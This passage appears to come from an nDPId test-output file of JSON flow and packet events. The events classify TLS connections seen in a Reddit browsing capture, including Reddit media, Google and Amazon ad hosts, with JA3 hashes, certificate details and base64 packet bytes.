CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":751,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":754,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":807,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":818,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686084,"flow_last_seen":1605291686183,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686183,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686301,"flow_last_seen":1605291686301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605291686301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686301,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3ML0AAAAAoAL9IDDZAAACBAWgBAIICql05vEAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605291686327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686327,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdEkHBFWUkNzC+oBJXgILuAAACBAV4AQMDAwQCCArC1zmoqXTm8Q=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1605291686327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686327,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3ML5BwRVmgBAB+wbmAAABAQgKqXTnC8LXOag="} +00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1211,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686301,"flow_last_seen":1605291686327,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686327,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1398,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686301,"flow_last_seen":1605291686419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686419,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01318{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686301,"flow_last_seen":1605291686420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686420,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","server_names":"*.thumbs.redditmedia.com,thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.thumbs.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:F4:6C:CF:D6:FD:64:3E:50:17:A2:DE:B0:F2:B6:9B:76:59:C6:75"}} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686985,"flow_last_seen":1605291686985,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686985,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605291686985,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686985,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duD88AAAAAoAL9IJsfAAACBAWgBAIIClRf4AwAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1926,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686985,"flow_last_seen":1605291686985,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686985,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1926,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1605291686985,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686985,"pkt":"qtsDr8lk5EKm5WPyht1gDjDtACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAN+SHGqeQBu3kB4hEAAAAAoAL9ICE+AAACBAWgBAIICkv6YkkAAAAAAQMDBw=="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1927,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686996,"flow_last_seen":1605291686996,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686996,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1927,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605291686996,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686996,"pkt":"qtsDr8lk5EKm5WPyht1gCh2fACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7O2lbABu20FmjEAAAAAoAL9ILJdAAACBAWgBAIICnOjJUYAAAAAAQMDBw=="} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1928,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605291687016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687016,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHENPm6q63bg\/QoBJXgIMUAAACBAV4AQMDAwQCCArC1zxZVF\/gDA=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1929,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1605291687016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687016,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duD9DT5uqvgBAB+wcHAAABAQgKVF\/gK8LXPFk="} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1930,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687016,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687016,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1931,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1605291687024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687024,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGhTs7YqAcsBIEmLB5kd7IUo3\/YpAbuVsAnf\/VJtBZoyoBJXgFGuAAACBAV4AQMDAwQCCArC1zxhc6MlRg=="} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1932,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605291687024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687024,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAA35IcYqAcsBIEmLB5kd7IUo3\/YpAbup5BqPq4R5AeISoBJXgAGtAAACBAV4AQMDAwQCCArC1zxhS\/piSQ=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1933,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1605291687024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687024,"pkt":"qtsDr8lk5EKm5WPyht1gCh2fACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7O2lbABu20FmjIJ3\/1TgBAB+9WjAAABAQgKc6MlYsLXPGE="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1934,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1605291687024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687024,"pkt":"qtsDr8lk5EKm5WPyht1gDjDtACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAN+SHGqeQBu3kB4hIaj6uFgBAB+4WXAAABAQgKS\/picMLXPGE="} +00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1935,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686996,"flow_last_seen":1605291687024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1936,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1938,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1949,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687075,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686996,"flow_last_seen":1605291687096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687096,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 